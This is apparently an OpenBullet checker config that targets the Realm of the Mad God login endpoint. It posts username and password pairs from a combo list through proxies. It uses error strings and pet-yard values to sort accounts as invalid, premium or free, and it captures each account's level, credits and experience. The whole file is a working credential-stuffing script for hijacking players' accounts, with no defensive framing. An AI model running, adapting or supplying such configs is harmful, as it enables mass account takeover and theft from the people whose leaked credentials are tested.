[SETTINGS]
{
  "Name": "RealmOfTheMadGod",
  "SuggestedBots": 1,
  "LastModified": "2018-07-03T20:48:25.1432632+00:00",
  "AdditionalInfo": "",
  "Author": "v0ilawes",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "None",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#GET_LOGIN_PAGE REQUEST POST "http://realmofthemadgodhrd.appspot.com/char/list?" AutoRedirect=TRUE 
  CONTENT "guid=<USER>&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "<Error>Account credentials not valid</Error>" 
  KEYCHAIN Success OR 
    KEY "<PetYardType>2</PetYardType>" 
    KEY "<PetYardType>3</PetYardType>" 
  KEYCHAIN CUSTOM "FREE" OR 
    KEY "<Exp>0</Exp>" 
    KEY "<PetYardType>1</PetYardType>" 
PARSE "<SOURCE>" LR "<Level>" "<" Recursive=FALSE -> CAP "lvl:" "" "" 
PARSE "<SOURCE>" LR "<PetYardType>" "<" Recursive=FALSE -> CAP "PetYardType" "" "" 
PARSE "<SOURCE>" LR "<Credits>" "<" Recursive=FALSE -> CAP "credit" "" "" 
PARSE "<SOURCE>" LR "<Exp>" "<" Recursive=FALSE -> CAP "xp" "" "" 
PARSE "<SOURCE>" LR "\" maxNumChars" "\">" Recursive=FALSE -> CAP "Char" "" "" 
